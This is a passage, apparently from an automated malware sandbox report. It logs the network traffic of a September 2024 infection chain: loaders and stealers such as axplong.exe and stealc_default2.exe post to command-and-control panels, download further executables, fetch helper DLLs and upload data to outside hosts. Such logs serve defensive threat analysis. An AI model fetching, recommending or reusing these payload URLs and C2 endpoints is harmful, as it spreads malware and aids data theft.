                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:05:34 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php?scr=1
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php?scr=1 HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----ODg1MzQ=
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 88686
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:05:39 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • 185.215.113.16:80
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                101.7kB
                                                                                                                                                4.9MB
                                                                                                                                                2053
                                                                                                                                                3498

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/inc/crypteda.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/inc/stealc_default2.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/inc/penis.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/inc/bundle.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/dobre/acentric.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/inc/2.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/dobre/splwow64.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.117:80
                                                                                                                                                http://185.215.113.117/inc/crypted.exe
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                118.6kB
                                                                                                                                                5.1MB
                                                                                                                                                2346
                                                                                                                                                3631

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.117/inc/gold.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.117/inc/needmoney.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.117/inc/crypted.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 95.179.250.45:26212
                                                                                                                                                RegAsm.exe
                                                                                                                                                912.7kB
                                                                                                                                                23.4kB
                                                                                                                                                685
                                                                                                                                                346
                                                                                                                                              • 65.21.18.51:45580
                                                                                                                                                bhh9YfYYwa.exe
                                                                                                                                                466.1kB
                                                                                                                                                15.2kB
                                                                                                                                                361
                                                                                                                                                160
                                                                                                                                              • 185.215.113.26:80
                                                                                                                                                http://185.215.113.26/Nework.exe
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                9.7kB
                                                                                                                                                439.0kB
                                                                                                                                                202
                                                                                                                                                318

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.26/Nework.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.26:80
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                http
                                                                                                                                                Hkbsse.exe
                                                                                                                                                1.1kB
                                                                                                                                                667 B
                                                                                                                                                13
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.26/Dem7kTu/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.26/Dem7kTu/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 95.216.107.53:12311
                                                                                                                                                6InNj3SOTk.exe
                                                                                                                                                465.3kB
                                                                                                                                                18.6kB
                                                                                                                                                373
                                                                                                                                                132
                                                                                                                                              • 185.215.113.17:80
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                http
                                                                                                                                                stealc_default2.exe
                                                                                                                                                185.7kB
                                                                                                                                                5.4MB
                                                                                                                                                3012
                                                                                                                                                3906

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/nss3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 103.130.147.211:80
                                                                                                                                                http://103.130.147.211/Files/2.exe
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                125.2kB
                                                                                                                                                6.9MB
                                                                                                                                                2672
                                                                                                                                                4931

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://103.130.147.211/Files/2.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.202.233.158:80
                                                                                                                                                http://91.202.233.158/e96ea2db21fa9a1b.php
                                                                                                                                                http
                                                                                                                                                svchost015.exe
                                                                                                                                                727 B
                                                                                                                                                625 B
                                                                                                                                                5
                                                                                                                                                5

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://91.202.233.158/

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://91.202.233.158/e96ea2db21fa9a1b.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.67:15206
                                                                                                                                                bundle.exe
                                                                                                                                                901.4kB
                                                                                                                                                22.1kB
                                                                                                                                                680
                                                                                                                                                315
                                                                                                                                              • 95.216.143.20:12695
                                                                                                                                                penis.exe
                                                                                                                                                463.7kB
                                                                                                                                                29.6kB
                                                                                                                                                373
                                                                                                                                                168
                                                                                                                                              • 188.225.44.114:80
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                http
                                                                                                                                                2.exe
                                                                                                                                                1.0kB
                                                                                                                                                381 B
                                                                                                                                                6
                                                                                                                                                4

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://fivevd5vs.top/v1/upload.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 188.225.44.114:80
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                http
                                                                                                                                                2.exe
                                                                                                                                                75.9kB
                                                                                                                                                1.7kB
                                                                                                                                                59
                                                                                                                                                37

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://fivevd5vs.top/v1/upload.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 194.58.114.223:80
                                                                                                                                                http://194.58.114.223/d/385121
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                370 B
                                                                                                                                                1.8kB
                                                                                                                                                7
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://194.58.114.223/d/385121

                                                                                                                                                HTTP Response

                                                                                                                                                302
                                                                                                                                              • 162.159.129.233:443
                                                                                                                                                https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
                                                                                                                                                tls, http
                                                                                                                                                axplong.exe
                                                                                                                                                324.5kB
                                                                                                                                                8.8MB
                                                                                                                                                5034
                                                                                                                                                6323

                                                                                                                                                HTTP Request

                                                                                                                                                GET https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 188.225.44.114:80
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                http
                                                                                                                                                2.exe
                                                                                                                                                33.8kB
                                                                                                                                                897 B
                                                                                                                                                29
                                                                                                                                                16

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://fivevd5vs.top/v1/upload.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 81.19.139.138:443
                                                                                                                                                conditionprovice.pro
                                                                                                                                                tls
                                                                                                                                                acentric.exe
                                                                                                                                                392 B
                                                                                                                                                219 B
                                                                                                                                                5
                                                                                                                                                5
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                120 B
                                                                                                                                                3
                                                                                                                                                3
                                                                                                                                              • 185.215.113.19:80
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php?scr=1
                                                                                                                                                http
                                                                                                                                                Waters.pif
                                                                                                                                                320.9kB
                                                                                                                                                37.1kB
                                                                                                                                                5387
                                                                                                                                                767

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php?scr=1

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.19:80
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                http
                                                                                                                                                Waters.pif
                                                                                                                                                1.3kB
                                                                                                                                                667 B
                                                                                                                                                14
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                tls
                                                                                                                                                MjytQiW.exe
                                                                                                                                                399 B
                                                                                                                                                219 B
                                                                                                                                                5
                                                                                                                                                5
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                tls
                                                                                                                                                MjytQiW.exe
                                                                                                                                                532 B
                                                                                                                                                219 B
                                                                                                                                                6
                                                                                                                                                5
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                tls
                                                                                                                                                MjytQiW.exe
                                                                                                                                                288 B
                                                                                                                                                219 B
                                                                                                                                                5
                                                                                                                                                5
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                MjytQiW.exe
                                                                                                                                                190 B
                                                                                                                                                92 B
                                                                                                                                                4
                                                                                                                                                2
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 142.250.179.227:80
                                                                                                                                                http://c.pki.goog/r/r1.crl
                                                                                                                                                http
                                                                                                                                                MjytQiW.exe
                                                                                                                                                348 B
                                                                                                                                                1.7kB
                                                                                                                                                5
                                                                                                                                                4

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://c.pki.goog/r/r1.crl

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 142.250.179.227:80
                                                                                                                                                http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX
                                                                                                                                                http
                                                                                                                                                MjytQiW.exe
                                                                                                                                                1.3kB
                                                                                                                                                4.6kB
                                                                                                                                                12
                                                                                                                                                8

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 216.58.204.78:443
                                                                                                                                                https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR
                                                                                                                                                tls, http
                                                                                                                                                MjytQiW.exe
                                                                                                                                                1.1kB
                                                                                                                                                8.6kB
                                                                                                                                                10
                                                                                                                                                12

                                                                                                                                                HTTP Request

                                                                                                                                                GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR

                                                                                                                                                HTTP Response

                                                                                                                                                302
                                                                                                                                              • 142.250.200.1:443
                                                                                                                                                https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                                                tls, http
                                                                                                                                                MjytQiW.exe
                                                                                                                                                1.6kB
                                                                                                                                                37.8kB
                                                                                                                                                20
                                                                                                                                                31

                                                                                                                                                HTTP Request

                                                                                                                                                GET https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 44.236.110.137:80
                                                                                                                                                http://api4.check-data.xyz/api2/google_api_ifi
                                                                                                                                                http
                                                                                                                                                rundll32.exe
                                                                                                                                                1.2kB
                                                                                                                                                536 B
                                                                                                                                                4
                                                                                                                                                3

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://api4.check-data.xyz/api2/google_api_ifi

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                3
                                                                                                                                              • 185.215.113.26:80
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                http
                                                                                                                                                Hkbsse.exe
                                                                                                                                                734 B
                                                                                                                                                667 B
                                                                                                                                                6
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.26/Dem7kTu/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.26/Dem7kTu/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                3
                                                                                                                                              • 185.215.113.16:80
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                736 B
                                                                                                                                                627 B
                                                                                                                                                6
                                                                                                                                                5

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 185.215.113.19:80
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php?scr=1
                                                                                                                                                http
                                                                                                                                                Waters.pif
                                                                                                                                                385.6kB
                                                                                                                                                69.2kB
                                                                                                                                                6728
                                                                                                                                                1378

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php?scr=1

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                80 B
                                                                                                                                                3
                                                                                                                                                2
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                120 B
                                                                                                                                                3
                                                                                                                                                3
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                52 B
                                                                                                                                                1
                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                fivevd5vs.top
                                                                                                                                                dns
                                                                                                                                                2.exe
                                                                                                                                                59 B
                                                                                                                                                75 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                fivevd5vs.top

                                                                                                                                                DNS Response

                                                                                                                                                188.225.44.114

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                dns
                                                                                                                                                axplong.exe
                                                                                                                                                64 B
                                                                                                                                                144 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                cdn.discordapp.com

                                                                                                                                                DNS Response

                                                                                                                                                162.159.129.233
                                                                                                                                                162.159.130.233
                                                                                                                                                162.159.133.233
                                                                                                                                                162.159.135.233
                                                                                                                                                162.159.134.233

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
                                                                                                                                                dns
                                                                                                                                                Waters.pif
                                                                                                                                                89 B
                                                                                                                                                164 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                conditionprovice.pro
                                                                                                                                                dns
                                                                                                                                                acentric.exe
                                                                                                                                                66 B
                                                                                                                                                82 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                conditionprovice.pro

                                                                                                                                                DNS Response

                                                                                                                                                81.19.139.138

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                service-domain.xyz
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                64 B
                                                                                                                                                80 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                service-domain.xyz

                                                                                                                                                DNS Response

                                                                                                                                                54.210.117.250

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                c.pki.goog
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                56 B
                                                                                                                                                107 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                c.pki.goog

                                                                                                                                                DNS Response

                                                                                                                                                142.250.179.227

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                o.pki.goog
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                56 B
                                                                                                                                                107 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                o.pki.goog

                                                                                                                                                DNS Response

                                                                                                                                                142.250.179.227

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                clients2.google.com
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                65 B
                                                                                                                                                105 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                clients2.google.com

                                                                                                                                                DNS Response

                                                                                                                                                216.58.204.78

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                clients2.googleusercontent.com
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                76 B
                                                                                                                                                121 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                clients2.googleusercontent.com

                                                                                                                                                DNS Response

                                                                                                                                                142.250.200.1

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                api4.check-data.xyz
                                                                                                                                                dns
                                                                                                                                                rundll32.exe
                                                                                                                                                65 B
                                                                                                                                                159 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                api4.check-data.xyz

                                                                                                                                                DNS Response

                                                                                                                                                44.236.110.137
                                                                                                                                                35.160.60.134

                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

